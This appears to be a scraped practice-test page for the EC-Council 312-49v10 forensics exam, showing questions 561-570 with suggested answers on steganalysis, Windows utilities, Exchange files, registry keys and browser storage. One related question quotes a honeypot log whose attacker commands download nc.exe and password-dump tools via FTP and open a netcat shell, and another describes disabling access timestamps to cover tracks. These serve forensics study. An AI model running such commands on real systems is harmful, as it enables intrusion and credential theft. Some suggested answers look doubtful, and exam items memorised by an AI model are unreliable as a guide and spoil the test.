ExamGecko
Search Search Login
Home Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 57

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?
In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads It to VirusTotal in order to confirm whether the file Is malicious, provide information about Its functionality, and provide Information that will allow to produce simple network signatures. What type of malware analysis was performed here?

Question 561

Report
Export
Collapse

In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?

A.
Chosen-message attack
A.
Chosen-message attack
Answers
B.
Known-cover attack
B.
Known-cover attack
Answers
C.
Known-message attack
C.
Known-message attack
Answers
D.
Known-stego attack
D.
Known-stego attack
Answers
Suggested answer: A

Question 562

Report
Export
Collapse

Which of these Windows utility help you to repair logical file system errors?

A.
Resource Monitor
A.
Resource Monitor
Answers
B.
Disk cleanup
B.
Disk cleanup
Answers
C.
Disk defragmenter
C.
Disk defragmenter
Answers
D.
CHKDSK
D.
CHKDSK
Answers
Suggested answer: D

Question 563

Report
Export
Collapse

Identify the term that refers to individuals who, by virtue of their knowledge and expertise, express an independent opinion on a matter related to a case based on the information that is provided.

A.
Expert Witness
A.
Expert Witness
Answers
B.
Evidence Examiner
B.
Evidence Examiner
Answers
C.
Forensic Examiner
C.
Forensic Examiner
Answers
D.
Defense Witness
D.
Defense Witness
Answers
Suggested answer: A

Question 564

Report
Export
Collapse

Steve, a forensic investigator, was asked to investigate an email incident in his organization. The organization has Microsoft Exchange Server deployed for email communications. Which among the following files will Steve check to analyze message headers, message text, and standard attachments?

A.
PUB.EDB
A.
PUB.EDB
Answers
B.
PRIV.EDB
B.
PRIV.EDB
Answers
C.
PUB.STM
C.
PUB.STM
Answers
D.
PRIV.STM
D.
PRIV.STM
Answers
Suggested answer: B

Question 565

Report
Export
Collapse

Which of the following information is displayed when Netstat is used with -ano switch?

A.
Ethernet statistics
A.
Ethernet statistics
Answers
B.
Contents of IP routing table
B.
Contents of IP routing table
Answers
C.
Details of routing table
C.
Details of routing table
Answers
D.
Details of TCP and UDP connections
D.
Details of TCP and UDP connections
Answers
Suggested answer: D

Question 566

Report
Export
Collapse

While collecting Active Transaction Logs using SQL Server Management Studio, the query Select * from ::fn_dblog(NULL, NULL) displays the active portion of the transaction log file. Here, assigning NULL values implies?

A.
Start and end points for log sequence numbers are specified
A.
Start and end points for log sequence numbers are specified
Answers
B.
Start and end points for log files are not specified
B.
Start and end points for log files are not specified
Answers
C.
Start and end points for log files are specified
C.
Start and end points for log files are specified
Answers
D.
Start and end points for log sequence numbers are not specified
D.
Start and end points for log sequence numbers are not specified
Answers
Suggested answer: B

Question 567

Report
Export
Collapse

Which of the following statements is TRUE with respect to the Registry settings in the user start-up folder HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\.

A.
All the values in this subkey run when specific user logs on, as this setting is user-specific
A.
All the values in this subkey run when specific user logs on, as this setting is user-specific
Answers
B.
The string specified in the value run executes when user logs on
B.
The string specified in the value run executes when user logs on
Answers
C.
All the values in this key are executed at system start-up
C.
All the values in this key are executed at system start-up
Answers
D.
All values in this subkey run when specific user logs on and then the values are deleted
D.
All values in this subkey run when specific user logs on and then the values are deleted
Answers
Suggested answer: D

Question 568

Report
Export
Collapse

Which cloud model allows an investigator to acquire the instance of a virtual machine and initiate the forensics examination process?

A.
PaaS model
A.
PaaS model
Answers
B.
IaaS model
B.
IaaS model
Answers
C.
SaaS model
C.
SaaS model
Answers
D.
SecaaS model
D.
SecaaS model
Answers
Suggested answer: B

Question 569

Report
Export
Collapse

An attacker successfully gained access to a remote Windows system and plans to install persistent backdoors on it. Before that, to avoid getting detected in future, he wants to cover his tracks by disabling the last-accessed timestamps of the machine. What would he do to achieve this?

A.
Set the registry value ofHKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 0
A.
Set the registry value ofHKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 0
Answers
B.
Run the command fsutil behavior set disablelastaccess 0
B.
Run the command fsutil behavior set disablelastaccess 0
Answers
C.
Set the registry value ofHKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 1
C.
Set the registry value ofHKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate to 1
Answers
D.
Run the command fsutil behavior set enablelastaccess 0
D.
Run the command fsutil behavior set enablelastaccess 0
Answers
Suggested answer: C

Question 570

Report
Export
Collapse

Which of the following web browser uses the Extensible Storage Engine (ESE) database format to store browsing records, including history, cache, and cookies?

A.
Safari
A.
Safari
Answers
B.
Mozilla Firefox
B.
Mozilla Firefox
Answers
C.
Microsoft Edge
C.
Microsoft Edge
Answers
D.
Google Chrome
D.
Google Chrome
Answers
Suggested answer: C
Total 704 questions
Go to page: of 71
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms